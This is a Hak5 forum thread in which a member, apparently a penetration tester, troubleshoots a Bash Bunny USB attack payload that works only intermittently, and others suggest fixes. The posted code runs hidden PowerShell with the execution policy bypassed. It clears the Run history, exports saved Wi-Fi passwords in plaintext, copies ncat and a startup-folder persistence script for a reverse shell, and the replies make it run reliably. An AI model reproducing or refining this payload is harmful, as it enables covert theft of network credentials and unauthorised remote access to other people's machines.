Jump to content
Hak5 Forums
GrineUlf

Payload sometimes not working...

Recommended Posts

Hey Guys,

I have a reverse shell payload on my bash bunny, that also extracts wifi profiles. It all works, but sometimes it doesn't work. I have updated the firmware to the latest version also, and still the issue happens. Mind you, this is happening at the same test computer that I always use for testing payloads.

Everytime I go on an engagement, or a colleague goes on an engagement, I make sure the bash bunny works and the payload is configured correctly. This again I did last Friday, and that is when I noticed the issue. First time I plugged it in, the payload did not run (even though the lights changed color according to the payload script, from setup, to attack, to finish). But no execution of the payload (like installing the persistence file, extracting the wifi profiles). So I ran it again, pull it out and plug it in again. This time all the files were copied and executed. Thinking the first test was just a fluke, I removed the files copied by the payload from the target machine, and tried it again. This time nothing was copied or executed. (All tests did show the proper lights blinking according to the payload script.)

Has anyone else had this problem before? Any suggestions on why this happens?

Thanks in advance ūüôā

Share this post


Link to post
Share on other sites

So this is hard to troubleshoot because you are using the BB in 2 different machines.  What rights does your shell require to execute?  Can you run the text in a dos/powershell box and get them to execute manually.  What policies are set on the target device?  Are there policies that may be preventing execution and/or copying files to a storage.  How are you getting the files to the BB?  As mentioned previously, if policies prevent mass storage, this may be blocking you.  What defensive items are on the device itself, AV, IDS, HIPS, NETWORK MONITORING, etc?  And a final thought, if it does execute, are you trying to connect back internally or externally?  There are many variables introduced in this scenario.

Share this post


Link to post
Share on other sites

Hmm, maybe payload executing before drivers are installed?

I do know on new systems with the BB if I do not have some sort of wait or check (like with network attack mode I wait till the target gets an ip) the BB will begin typing before it is able to type on the victim hence the stager is never launched.  That is the only time I seen it not execute on first try on a machine but then execute on the second try on same machine.

This is why I normally use network delivery so I can do dual attack and use the network detection to let me know when the target has drivers loaded by it getting an IP.  Do not know how of if you can do this with HID only or HID and storage.  I seen most people put a standard delay after setting the attack before proceeding like 5 seconds or so.

 

  • Like 1

Share this post


Link to post
Share on other sites
11 hours ago, PoSHMagiC0de said:

Hmm, maybe payload executing before drivers are installed?

I agree. I've had a number of problems, originally with the USB Rubber Ducky, but also with the Bash Bunny where the drivers just aren't installed on the computer from the get-go, so sometimes plugging it in first, waiting until it is set up, then after a delay running the payload can be beneficial.

 

As an aside, some of the PID/VIDs for certain drivers come pre-installed on Windows, and other Operating Systems... maybe there is a way to use a pre-installed driver on Windows for example to make things work without having to set up the device each time...?

Share this post


Link to post
Share on other sites
18 hours ago, korang said:

So this is hard to troubleshoot because you are using the BB in 2 different machines.  What rights does your shell require to execute?  Can you run the text in a dos/powershell box and get them to execute manually.  What policies are set on the target device?  Are there policies that may be preventing execution and/or copying files to a storage.  How are you getting the files to the BB?  As mentioned previously, if policies prevent mass storage, this may be blocking you.  What defensive items are on the device itself, AV, IDS, HIPS, NETWORK MONITORING, etc?  And a final thought, if it does execute, are you trying to connect back internally or externally?  There are many variables introduced in this scenario.

I use the bash bunny only on one machine for the tests. Simple user rights are the only thing that is required as the files get copied to the %USERPROFILE% directory. Other then that, it is a simple windows 10 machine.

14 hours ago, PoSHMagiC0de said:

Hmm, maybe payload executing before drivers are installed?

I do know on new systems with the BB if I do not have some sort of wait or check (like with network attack mode I wait till the target gets an ip) the BB will begin typing before it is able to type on the victim hence the stager is never launched.  That is the only time I seen it not execute on first try on a machine but then execute on the second try on same machine.

This is why I normally use network delivery so I can do dual attack and use the network detection to let me know when the target has drivers loaded by it getting an IP.  Do not know how of if you can do this with HID only or HID and storage.  I seen most people put a standard delay after setting the attack before proceeding like 5 seconds or so.

 

I will definitely try the wait on it. Maybe that will solve the problem, as it does seem that sometimes it takes longer for the bash bunny to load then on other times.

2 hours ago, MB60893 said:

I agree. I've had a number of problems, originally with the USB Rubber Ducky, but also with the Bash Bunny where the drivers just aren't installed on the computer from the get-go, so sometimes plugging it in first, waiting until it is set up, then after a delay running the payload can be beneficial.

 

As an aside, some of the PID/VIDs for certain drivers come pre-installed on Windows, and other Operating Systems... maybe there is a way to use a pre-installed driver on Windows for example to make things work without having to set up the device each time...?

If the delay is not enough, I will also try the PID/VIDs, as they currently are set to the default. Also I notice that the bash bunny is seen as a Network device, even though I am using HID STORAGE as the attack mode. Could this be a reason for the problem as well? As in perhaps loading the wrong drivers for the desired attack mode?

Share this post


Link to post
Share on other sites

HID networking can definitely cause problems. Check the attackmode is being set properly, and it isn't showing up as an ECM_Ethernet adapter or whatever.

 

Standard keyboards and flash storage are your best bet.

Share this post


Link to post
Share on other sites
2 hours ago, MB60893 said:

HID networking can definitely cause problems. Check the attackmode is being set properly, and it isn't showing up as an ECM_Ethernet adapter or whatever.

 

Standard keyboards and flash storage are your best bet.

Here is the payload code, as you can see the attack mode is set to hid and storage. Yet Windows sees the device for some reason as an Ethernet Device.

DUCKY_LANG='dk'

LED SETUP
 
ATTACKMODE HID STORAGE
 
GET SWITCH_POSITION
 
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
 
LED ATTACK
 
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\e.bat')"
 
LED FINISH 

I'm not sure exactly what the win7-win8-cdc-acm.inf file does, but just for certainty, here are the contents.

; Windows USB CDC ACM Setup File

; Based on INF template which was:
;     Copyright (c) 2000 Microsoft Corporation
;     Copyright (c) 2007 Microchip Technology Inc.
; likely to be covered by the MLPL as found at:
;    <http://msdn.microsoft.com/en-us/cc300389.aspx#MLPL>.
; For use only on Windows operating systems.

[Version]
Signature="$Windows NT$"
Class=Ports
ClassGuid={4D36E978-E325-11CE-BFC1-08002BE10318}
Provider=%Linux%
DriverVer=11/15/2007,5.1.2600.0

[Manufacturer]
%Linux%=DeviceList, NTamd64

[DestinationDirs]
DefaultDestDir=12


;------------------------------------------------------------------------------
;  Windows 2000/XP/Vista-32bit Sections
;------------------------------------------------------------------------------

[DriverInstall.nt]
include=mdmcpq.inf
CopyFiles=DriverCopyFiles.nt
AddReg=DriverInstall.nt.AddReg

[DriverCopyFiles.nt]
usbser.sys,,,0x20

[DriverInstall.nt.AddReg]
HKR,,DevLoader,,*ntkern
HKR,,NTMPDriver,,USBSER.sys
HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider"

[DriverInstall.nt.Services]
AddService=usbser, 0x00000002, DriverService.nt

[DriverService.nt]
DisplayName=%SERVICE%
ServiceType=1
StartType=3
ErrorControl=1
ServiceBinary=%12%\USBSER.sys

;------------------------------------------------------------------------------
;  Vista-64bit Sections
;------------------------------------------------------------------------------

[DriverInstall.NTamd64]
include=mdmcpq.inf
CopyFiles=DriverCopyFiles.NTamd64
AddReg=DriverInstall.NTamd64.AddReg

[DriverCopyFiles.NTamd64]
USBSER.sys,,,0x20

[DriverInstall.NTamd64.AddReg]
HKR,,DevLoader,,*ntkern
HKR,,NTMPDriver,,USBSER.sys
HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider"

[DriverInstall.NTamd64.Services]
AddService=usbser, 0x00000002, DriverService.NTamd64

[DriverService.NTamd64]
DisplayName=%SERVICE%
ServiceType=1
StartType=3
ErrorControl=1
ServiceBinary=%12%\USBSER.sys


;------------------------------------------------------------------------------
;  Vendor and Product ID Definitions
;------------------------------------------------------------------------------
; When developing your USB device, the VID and PID used in the PC side
; application program and the firmware on the microcontroller must match.
; Modify the below line to use your VID and PID.  Use the format as shown
; below.
; Note: One INF file can be used for multiple devices with different
;       VID and PIDs.  For each supported device, append
;       ",USB\VID_xxxx&PID_yyyy" to the end of the line.
;------------------------------------------------------------------------------
[SourceDisksFiles]
[SourceDisksNames]
[DeviceList]
%DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00

[DeviceList.NTamd64]
%DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00


;------------------------------------------------------------------------------
;  String Definitions
;------------------------------------------------------------------------------
;Modify these strings to customize your device
;------------------------------------------------------------------------------
[Strings]
Linux               = "Linux Developer Community"
DESCRIPTION         = "Gadget Serial"
SERVICE             = "USB RS-232 Emulation Driver"

And last, but not least, the actual batch file contents:

@echo off
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
set files=%~dp0\
set destnc=C:\temp\
set destp=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
set tm=%date:~-4,4%%date:~-10,2%%date:~-7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

set tm=%tm: =%
set wifi=%~d0\loot\%COMPUTERNAME%_%tm%\wifi_profiles
mkdir %wifi% >>nul
netsh wlan export profile key=clear folder=%wifi%

robocopy "%files% " "%destnc% " "ncat.exe"
robocopy "%files% " "%destp% " "persistence.vbs"

C: 
cd %destp%

cmd /c "persistence.vbs"
exit

Although I doubt the problem actually lies with the payload itself, as sometimes it does work, and sometimes it does not. As in, sometimes it does copy the files, and start the reverse connection, and sometimes it just doesn't.

Thanks for the help so far all ūüôā

Share this post


Link to post
Share on other sites
Posted (edited)

OK, so I would try running the files separately on the machine without the bash bunny. If that works, then a few things could be wrong with it.

 

1. The bunny needs a USB power source that can supply at least 5V at 1.5A, as per https://wiki.bashbunny.com/#!index.md.

2. Sometimes switching ATTACKMODE HID STORAGE to read ATTACKMODE STORAGE HID can fix things, or vice versa. I think there may be a few problems with how the devices are emulated based on the sequence each thing is set up in.

3. I notice you have the Ducky Language set to "dk", (Danish...?) maybe try a different language with similar keyboard configurations, or even go straight for a US keyboard layout. That may make a difference.

4. There are some cases where machines can actually have VBScripts and Command Line Batch Files disabled through registry settings. I doubt that would be the case here, but it is something to consider.

5. I am unfamiliar with the following line expressed in your code above:

RUN WIN Powershell -nop -ex Bypass -w Hidden 

I get the basic premise behind this, but surely, just using "Q GUI R" followed by a slight delay, then "Q STRING <Powershell line here>", then "Quack ENTER" would also do the job...?

6. You'll also want to ensure this script is indeed running as an Administrator, otherwise a good selection of the commands won't work. The command "reg" and creating/moving things to the root of the C Drive can also cause problems, even if you have a folder called "temp" under the path "C:\Temp", this can also be protected and require administrator privileges to perform read/write commands to this directory. Same story with NETSH, and that can also have a different name from "WLAN" from recollection as well, whether it be "Wi-Fi" or "Wireless Local Area Network Connection" or something else... I don't know if these are particularly relevant to your problem, but they are all things to consider.

 

Don't worry too much about the win7-win8-cdc-acm.inf file. It looks like its needed for setting drivers correctly.

 

Hope these help diagnose your problems!

-M.

Edited by MB60893

Share this post


Link to post
Share on other sites
On 6/13/2018 at 12:41 PM, MB60893 said:

OK, so I would try running the files separately on the machine without the bash bunny. If that works, then a few things could be wrong with it.

 

1. The bunny needs a USB power source that can supply at least 5V at 1.5A, as per https://wiki.bashbunny.com/#!index.md.

2. Sometimes switching ATTACKMODE HID STORAGE to read ATTACKMODE STORAGE HID can fix things, or vice versa. I think there may be a few problems with how the devices are emulated based on the sequence each thing is set up in.

3. I notice you have the Ducky Language set to "dk", (Danish...?) maybe try a different language with similar keyboard configurations, or even go straight for a US keyboard layout. That may make a difference.

4. There are some cases where machines can actually have VBScripts and Command Line Batch Files disabled through registry settings. I doubt that would be the case here, but it is something to consider.

5. I am unfamiliar with the following line expressed in your code above:


RUN WIN Powershell -nop -ex Bypass -w Hidden 

I get the basic premise behind this, but surely, just using "Q GUI R" followed by a slight delay, then "Q STRING <Powershell line here>", then "Quack ENTER" would also do the job...?

6. You'll also want to ensure this script is indeed running as an Administrator, otherwise a good selection of the commands won't work. The command "reg" and creating/moving things to the root of the C Drive can also cause problems, even if you have a folder called "temp" under the path "C:\Temp", this can also be protected and require administrator privileges to perform read/write commands to this directory. Same story with NETSH, and that can also have a different name from "WLAN" from recollection as well, whether it be "Wi-Fi" or "Wireless Local Area Network Connection" or something else... I don't know if these are particularly relevant to your problem, but they are all things to consider.

 

Don't worry too much about the win7-win8-cdc-acm.inf file. It looks like its needed for setting drivers correctly.

 

Hope these help diagnose your problems!

-M.

Update from my side, switching the attackmode from hid storage to storage hid, and adding the delay worked! Also I changed the load point of the temp folder, which is now in %USERPROFILE%/temp which works amazingly. I tried the Q GUI R, but for some reason that didn't work, so I stayed with the RUN WIN as pointed out in the bash bunny manual.

It is true about the command line and vbscripts possibly be disabled on some machines through policies (had that with a few engagements in the past), but that is just a risk that I need to take.

But at least it works now ūüôā Thanks all for the input!

  • Like 1

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×